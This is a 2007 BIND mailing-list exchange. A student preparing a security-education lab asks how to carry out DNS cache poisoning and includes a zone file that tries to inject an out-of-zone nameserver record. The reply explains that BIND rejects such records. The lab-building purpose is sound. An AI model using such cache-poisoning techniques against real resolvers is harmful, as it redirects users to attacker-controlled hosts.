Reg : DNS Cache poisoning
kcd at daimlerchrysler.com
Tue Sep 18 22:57:35 UTC 2007
What you're attempting -- including data for one zone in the zonefile of
another zone -- is an obvious violation of the RFCs and BIND has
rejected it for a long time. The only thing that's changed between the
various versions of BIND 8 and BIND 9 in this regard, is whether BIND
believes/trusts/caches records it *receives* from other sources, under
certain circumstances. If you want to *generate* malicious
cache-poisoning records in DNS responses, you'll need to use some other
package, or write your own code...
Sudheer Bysani wrote:
> I'm in the process of developing a lab for Security Education
> (http://www.cis.syr.edu/~wedu/seed/index.html) and require some help on
> conducting DNS Cache Poisoning attacks.
> Pharming Guide (http://www.ngssoftware.com/papers/ThePharmingGuide.pdf)
> explains DNS Cache poisoning attack, where in the attacker name server
> includes the additional (faked) resolution records (of other websites)
> apart from what its actually asked for.
> I'm wondering how exactly to do this. I know this issue has been fixed
> in Bind 9. I was trying the same in 8.4.6, but still unsuccessful.
> This is my SOA for the same:
> @ IN SOA ns1.example.com. admin.example.com. (
> example.com. IN NS ns1.example.com.
> example.com. IN NS *ns2.someweb.com.*
> example.com. IN MX 10 mail.example.com.
> ns1 IN A 192.168.1.1
> *ns2.someweb.com. IN A 192.168.1.2*
> Now, if I try to dig www.example.com, it shows ns2.someweb.com as one of
> the name servers, but it actually resolves the IP address of
> ns2.someweb.com if it actually exists.
> How do I make the bind resolve ns2.someweb.com to the IP address I
> mention ?
> Is it actually possible to send fake resolution records for the domain
> which the name server doesn't represent ?
> Any help is appreciated.
More information about the bind-users